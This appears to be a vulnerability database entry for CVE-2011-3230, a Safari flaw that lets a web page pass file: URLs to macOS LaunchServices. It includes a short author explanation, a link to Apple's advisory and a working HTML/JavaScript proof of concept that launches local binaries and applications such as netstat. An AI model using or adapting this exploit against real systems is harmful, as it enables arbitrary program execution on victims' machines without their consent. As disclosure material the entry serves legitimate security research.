Apple Safari Arbitrary Code Execution

2011-10-1500:00:00

Root

www.seebug.org

0.909 High

EPSS

Percentile

98.6%

JSON

No description provided by source.


                                                CVE: CVE-2011-3230
Found By: Aaron Sigel of vtty.com

There's not a ton to say about this bug aside from &quot;Yikes&quot;!  I think the PoC speaks for itself.  This allows you to send any &quot;file:&quot; url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.  The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it.  Other than that, you can run or launch anything you can access by using the method in the html provided below.

&lt;html&gt;
&lt;head&gt;
&lt;base href=&quot;file://&quot;&gt;
&lt;script&gt;
 function DoIt() {
  alert(document.getElementById(&quot;cmdToRun&quot;).value);
  document.location=document.getElementById(&quot;cmdToRun&quot;).value;
 }
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;select id=&quot;cmdToRun&quot;&gt;
 &lt;option value=&quot;/usr/sbin/netstat&quot;&gt;Launch /usr/bin/netstat&lt;/option&gt;
 &lt;option value=&quot;/etc/passwd&quot;&gt;Launch /etc/passwd&lt;/option&gt;
 &lt;option value=&quot;/Applications/Utilities/Bluetooth File Exchange.app&quot;&gt;
Launch Bluetooth File Exchange.app&lt;/option&gt;
&lt;/select&gt;
&lt;br /&gt;
&lt;input type=button value=&quot;Launch&quot; onclick=&quot;DoIt()&quot;&gt;
&lt;br /&gt;
&lt;/body&gt;
&lt;/html&gt;


Apple's advisory: http://support.apple.com/kb/HT5000

0.909 High

EPSS

Percentile

98.6%

JSON

Related for SSV:21029